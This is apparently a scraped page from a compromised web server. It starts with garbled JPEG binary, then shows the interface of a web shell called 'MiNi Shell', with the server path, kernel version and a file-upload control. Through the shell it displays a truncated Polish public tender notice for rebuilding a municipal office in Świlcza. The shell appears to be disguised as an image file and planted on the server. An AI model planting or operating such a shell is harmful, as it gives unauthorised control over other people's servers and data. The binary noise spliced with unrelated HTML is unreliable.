JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210721/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210721/0012285701-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00122857 z dnia 2021-07-21</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Przebudowa i nadbudowa budynku nr 2 Urzędu Gminy Świlcza </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Świlcza</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 690582140</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Świlcza</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Świlcza</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">36-072</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL823 - Rzeszowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">17 8670135</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@swilcza.com.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.swilcza.com.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przebudowa i nadbudowa budynku nr 2 Urzędu Gminy Świlcza </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-4c330c38-e988-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00122857</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-07-21</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00003142/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.8 Nadbudowa budynku Euroregionalnego Centrum Informacji Gospodarczej, Kulturalnej i Turystycznej</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/gmina_swilcza <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. Składanie ofert (w tym<br/>pełnomocnictwa, oświadczenie, o którym mowa w art. 125 ust. 1 ustawy, inne dokumenty składające<br/>się na ofertę, o których mowa w SWZ i ustawie): Ofertę należy złożyć w sposób przewidziany w sekcji<br/>III.3.6. ogłoszenia. Ofertę wraz z załącznikami należy przesyłać drogą elektroniczną za pośrednictwem:<br/>https://platformazakupowa.pl/pn/gmina_swilcza (patrz: sekcja VIII.8.2ogłoszenia) 2. Sposób<br/>komunikowania się Zamawiającego z Wykonawcami (nie dotyczy składania ofert): W postępowaniu o<br/>udzielenie zamówienia komunikacja pomiędzy Zamawiającym a Wykonawcami w szczególności<br/>składanie oświadczeń, wniosków, zawiadomień, podmiotowych środków dowodowych oraz<br/>przekazywanie informacji (innych niż wskazanych w pkt. 1) odbywa się elektronicznie za<br/>pośrednictwem poczty elektronicznej (e-mail). Adres poczty elektronicznej do komunikacji<br/>Wykonawców z Zamawiającym (email): przetargi@swilcza.com.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.Oferty(w tym pełnomocnictwa, oświadczenie, o którym mowa w art. 125 ust. 1 ustawy , inne<br/>dokumenty składające się na ofertę, o których mowa w SWZ i ustawie):1) Wykonawca zamierzający<br/>wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi zarejestrować (zalogować)<br/>się na Platformie i postępować zgodnie z instrukcjami dostępnymi u dostawcy rozwiązania<br/>informatycznego pod adresem: https://platformazakupowa.pl/pn/gmina_swilcza. Ofertę wraz z<br/>załącznikami należy przesyłać drogą elektroniczną za pośrednictwem:<br/>https://platformazakupowa.pl/pn/gmina_swilcza. W formularzu oferty Wykonawca zobowiązany jest<br/>podać adres poczty elektronicznej (e-mail), na którym prowadzona będzie korespondencja związana z<br/>postępowaniem. 2) Zamawiający informuje, że instrukcje korzystania z Platformy dotyczące w<br/>szczególności logowania, składania wniosków o wyjaśnienie treści SWZ, składania ofert, wielkości<br/>przesyłanych plików, odbierania dokumentów elektronicznych, zmiana lub wycofanie oferty oraz innych<br/>czynności podejmowanych w niniejszym postępowaniu przy użyciu Platformy znajdują się w<br/>zakładce„Instrukcje dla Wykonawców” na stronie internetowej pod adresem:<br/>https://platformazakupowa.pl/strona/45-instrukcje3) ofertę sporządza się,pod rygorem nieważności, w<br/>formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem<br/>osobistym;4) w celu złożenia oferty należy zarejestrować (zalogować) się na Platformie i postępować<br/>zgodnie z instrukcjami dostępnymi u dostawcy rozwiązania informatycznego pod<br/>adresem:https://drive.google.com/file/d/1Kd1DttbBeiNWt4q4slS4t76lZVKPbkyD/view5) jeżeli<br/>dokumenty elektroniczne, przekazywane przy użyciu środków komunikacji elektronicznej, zawierają<br/>informacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu przepisów ustawy z dnia 16<br/>kwietnia1993 r. o zwalczaniu nieuczciwej konkurencji (Dz. U. z 2020 r. poz. 1913), wykonawca, w celu<br/>utrzymania w<br/>poufności tych informacji, przekazuje je w wydzielonym i odpowiednio oznaczonym pliku,wraz z<br/>jednoczesnym zaznaczeniem polecenia „Załącznik stanowiący tajemnicę przedsiębiorstwa”;6)do oferty<br/>należy dołączyć dokumenty wymagane w ustawie oraz w SWZ, w formie elektronicznej lub w postaci<br/>elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym, a następnie zaszyfrować wraz<br/>z plikami stanowiącymi ofertę;7) oferta może być złożona tylko do upływu terminu składania<br/>ofert;8)Wykonawca po upływie terminu do składania ofert nie może skutecznie dokonać zmiany ani<br/>wycofać złożonej oferty;9) dane postępowanie można wyszukać na Liście wszystkich postępowań pod<br/>adresem: https://platformazakupowa.pl ze strony głównej z zakładki Postępowania lub pod<br/>adresem:https://platformazakupowa.pl/pn/gmina_swilcza klikając opcję Postępowania.2. Sposób<br/>komunikowaniasię Zamawiającego z Wykonawcami (nie dotyczy składania ofert)1) w postępowaniu o<br/>udzielenie zamówienia komunikacja pomiędzy Zamawiającym, a Wykonawcami w szczególności<br/>składanie oświadczeń, wniosków, zawiadomień, podmiotowych środków dowodowych oraz<br/>przekazywanie informacji (innych niż wskazanych w ust. 1 odbywa się elektronicznie za pośrednictwem<br/>poczty elektronicznej (e-mail) lub poprzez Platformę, dostępną pod adresem:<br/>https://platformazakupowa.pl/pn/gmina_swilcza2) we wszelkiej korespondencji związanej z niniejszym<br/>postępowaniem Zamawiający i Wykonawcy posługują się numerem ogłoszenia (BZP) lub numerem<br/>referencyjnym nadanym przez zamawiającego;3) adres poczty elektronicznej do komunikacji<br/>Wykonawców z Zamawiającym (e-mail): przetargi@swilcza.com.pl;4) za datę przekazania oświadczeń,<br/>wniosków, zawiadomień, podmiotowych środków dowodowych oraz informacji (innych niż wskazanych<br/>w pkt 1 przyjmuje się datę ich przekazania na platformie -<br/>https://platformazakupowa.pl/pn/gmina_swilcza lub wpłynięcia na adres poczty elektronicznej<br/>wskazany w pkt 3;</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE<br/>L119z04.05.2016, str. 1, z późn. zm.), dalej „RODO”, informuję, że: -administratorem Pani/Pana<br/>danych osobowych jest Gmina Świlcza, 36-072 Świlcza 168; tel.: 17 8670100, fax: 17 8670157,<br/>email:ug.swilcza@intertele,pl;- inspektorem ochrony danych osobowych u zamawiającego jak wyżej<br/>jest Pan Daniel Panek, kontakt z Inspektorem Ochrony Danych – biuro@mpls.com.pl;-Pani/Panadane<br/>osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z<br/>postępowaniem o udzielenie zamówienia publicznego pn. Przebudowa i nadbudowa budynku nr 2<br/>Urzędu Gminy Świlcza, numer referencyjny: RGI.271.19.2021, prowadzonym w trybie podstawowym;-<br/>odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ust. 1 ustawy z dn. 11 września 2019 r. –<br/>Prawo zamówień publicznych (Dz. U. z 2019 r. poz. 2019 ze zm.), dalej „ustawa Pzp”;-Pani/Pana dane<br/>osobowe będą przechowywane, zgodnie z art. 78 ustawy Pzp, przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata,okres<br/>przechowywania obejmuje cały czas trwania umowy;- obowiązek podania przez Panią/Pana danych<br/>osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w<br/>przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia<br/>publicznego;konsekwencje niepodania określonych danych wynikają z ustawy Pzp;-w odniesieniu do<br/>Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany,stosowanie<br/>do art. 22RODO;- posiada Pani/Pan:– na podstawie art. 15 RODO prawo dostępu dodanych<br/>osobowych Pani/Pana dotyczących*;– na podstawie art. 16 RODO prawo do sprostowania Pani/Pana<br/>danych osobowych** ;– na podstawie art. 18 RODO prawo żądania od administratora ograniczenia<br/>przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18ust. 2<br/>RODO***;– prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna<br/>Pani/Pan,że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;-nie<br/>przysługuje Pani/Panu:– w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych<br/>osobowych;– prawo do przenoszenia danych osobowych, o którym mowa w art.20RODO;– na<br/>podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą<br/>prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO;-w przypadku<br/>korzystania przez osobę, której dane osobowe są przetwarzane przez zamawiającego, z uprawnienia,o<br/>którym mowa w art. 15 ust. 1–3 RODO, zamawiający może żądać od osoby występującej z żądaniem<br/>wskazania dodatkowych informacji, mających na celu sprecyzowanie nazwy lub daty zakończonego<br/>postępowania o udzielenie zamówienia;-Zamawiający udostępnia dane osobowe, o których mowa wart.<br/>10 RODO, w celu umożliwienia korzystania ze środków ochrony prawnej, o których mowa w dziale IX<br/>ustawy, do upływu terminu na ich wniesienie;-przysługuje Pani/Panu prawo wniesienia skargi do<br/>organu nadzorczego na niezgodne z RODO przetwarzanie Pani/Pana danych osobowych przez<br/>administratora. Organem właściwym dla przedmiotowej skargi jest Urząd Ochrony Danych<br/>Osobowych, ul. Stawki 2, 00-193 Warszawa</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Patrz: sekcja III 3.15 ogłoszenia: * Wyjaśnienie: W<br/>przypadku gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1– 3 RODO, wymagałoby<br/>niewspółmiernie dużego wysiłku, zamawiający może żądać od osoby, której dane dotyczą,wskazania<br/>dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub<br/>daty postępowania o udzielenie zamówienia publicznego; ** Wyjaśnienie:Skorzystanie przez<br/>osobę,której dane osobowe dotyczą, z uprawnienia do sprostowania lub uzupełnienia, o którym mowa<br/>w art.16 RODO, nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia ani<br/>zmianą postanowień umowy w sprawie zamówienia publicznego w zakresie niezgodnym z<br/>ustawą.Skorzystanie przez osobę, której dane osobowe są przetwarzane, z uprawnienia do<br/>sprostowania lub uzupełnienia danych osobowych, o którym mowa w art. 16 RODO, nie może<br/>naruszać integralności protokołu postępowania oraz jego załączników; *** Wyjaśnienie: Prawo do<br/>ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu<br/>zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej<br/>lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa<br/>członkowskiego. W postępowaniu o udzielenie zamówienia zgłoszenie żądania ograniczenia<br/>przetwarzania, o którym mowa w art. 18 ust.1RODO, nie ogranicza przetwarzania danych osobowych<br/>do czasu zakończenia tego postępowania;</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RGI.271.19.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przebudowa i nadbudowa budynku nr 2 Urzędu Gminy Świlcza w zakresie zabudowy tarasu na<br/>poziomie drugiego piętra do wysokości pozostałej części budynku wraz z budową wewnętrznej<br/>instalacji energii elektrycznej oraz centralnego ogrzewania na dz. nr ewid. 3622/4<br/>w miejscowości Świlcza, gmina Świlcza w zakresie wykonania:<br/>1) roboty budowlane:<br/>a) roboty rozbiórkowe,<br/>b) rdzenie,<br/>c) belki,<br/>d) nadproża okienne,<br/>e) wieńce,<br/>f) ściany,<br/>g) kominy,<br/>h) nadproże poz. 3.N-1 – 2xIPE160,<br/>i) nadproże poz. 3.N-5 – 2xIPE120,<br/>j) podłoża,<br/>k) konstrukcja stalowa więźby dachowej,<br/>l) pokrycie dachu,<br/>m) ścianki działowe,<br/>n) stolarka drzwiowa – wewnętrzna,<br/>o) stolarka okienna,<br/>p) tynki,<br/>q) roboty malarskie,<br/>r) sufity podwieszane,<br/>s) posadzki,<br/>t) docieplenie ścian,<br/>u) docieplenie kominów, obróbki blacharskie,<br/>v) rynny, rury spustowe,<br/>w) naprawa i odnowienie elewacji poniżej nadbudowy;<br/>2) roboty elektryczne:<br/>a) tablice,<br/>b) oprawy,<br/>c) osprzęt instalacyjny,<br/>d) układanie przewodów instalacyjnych,<br/>e) pomiary elektryczne,<br/>f) roboty przygotowawcze dla instalacji fotowoltaicznej;<br/>3) roboty sanitarne:<br/>a) centralne ogrzewanie,<br/>b) klimatyzacja.<br/>Szczegółowy opis i zakres przedmiotu zamówienia określa Specyfikacja Warunków<br/>Zamówienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45110000-1 - Roboty w zakresie burzenia i rozbiórki obiektów budowlanych; roboty ziemne</p> <p class="mb-0">45111100-9 - Roboty w zakresie burzenia</p> <p class="mb-0">45111220-6 - Roboty w zakresie usuwania gruzu</p> <p class="mb-0">45223100-7 - Montaż konstrukcji metalowych</p> <p class="mb-0">45223820-0 - Gotowe elementy i części składowe</p> <p class="mb-0">45260000-7 - Roboty w zakresie wykonywania pokryć i konstrukcji dachowych i inne podobne roboty specjalistycze</p> <p class="mb-0">45261100-5 - Wykonywanie konstrukcji dachowych</p> <p class="mb-0">45261320-3 - Kładzenie rynien</p> <p class="mb-0">45262310-7 - Zbrojenie</p> <p class="mb-0">45262311-4 - Betonowanie konstrukcji</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45311000-0 - Roboty w zakresie okablowania oraz instalacji elektrycznych</p> <p class="mb-0">45320000-6 - Roboty izolacyjne</p> <p class="mb-0">45331100-7 - Instalowanie centralnego ogrzewania</p> <p class="mb-0">45331210-1 - Instalowanie wentylacji</p> <p class="mb-0">45410000-4 - Tynkowanie</p> <p class="mb-0">45421000-4 - Roboty w zakresie stolarki budowlanej</p> <p class="mb-0">45421100-5 - Instalowanie drzwi i okien, i podobnych elementów</p> <p class="mb-0">45421146-9 - Instalowanie sufitów podwieszanych</p> <p class="mb-0">45432210-9 - Wykładanie ścian</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">4 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji i rękojmi za wady</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunek dotyczący<br/>zdolności technicznej lub zawodowej, tzn. Wykonawcy, którzy w okresie ostatnich pięciu lat<br/>przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w<br/>tym okresie wykonał należycie co najmniej trzy roboty budowlane polegające na budowie,<br/>przebudowie, modernizacji lub remoncie budynku o wartości brutto minimum 150 000,00 zł<br/>(słownie: sto pięćdziesiąt tysięcy złotych) każda z tych robót budowlanych;<br/>Wykonawcy wspólnie ubiegający się o zamówienie muszą wykazać, że warunek udziału w<br/>postępowaniu jak wyżej – spełnia jeden z wykonawców samodzielnie lub łącznie (kumulatywnie)<br/>wszyscy/ kilku wykonawców wchodzących w skład grupy wykonawców wspólnie ubiegających<br/>się o zamówienie.<br/>W przypadku wykonawców rozliczających się w innej walucie niż PLN (polski złoty), przeliczenia<br/>walut należy dokonać według tabeli kursów średnich opublikowanych przez Narodowy Bank<br/>Polski w dniu wykonania zamówienia przez wykonawcę, a jeżeli w tym dniu kursów nie<br/>ogłoszono, to według kursów ostatnio przed tą datą ogłoszonych.<br/>W odniesieniu do warunków dotyczących doświadczenia wykonawcy wspólnie ubiegający się o<br/>udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają<br/>usługi, do realizacji których te zdolności są wymagane.<br/>2. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunek dotyczący<br/>zdolności technicznej lub zawodowej, tzn. wykonawcy którzy dysponują co najmniej:<br/>1) 1 osobą posiadającą uprawnienia do wykonywania samodzielnych funkcji technicznych w<br/>budownictwie tj. do kierowania robotami w specjalności konstrukcyjno – budowlanej bez<br/>ograniczeń (lub odpowiadające im 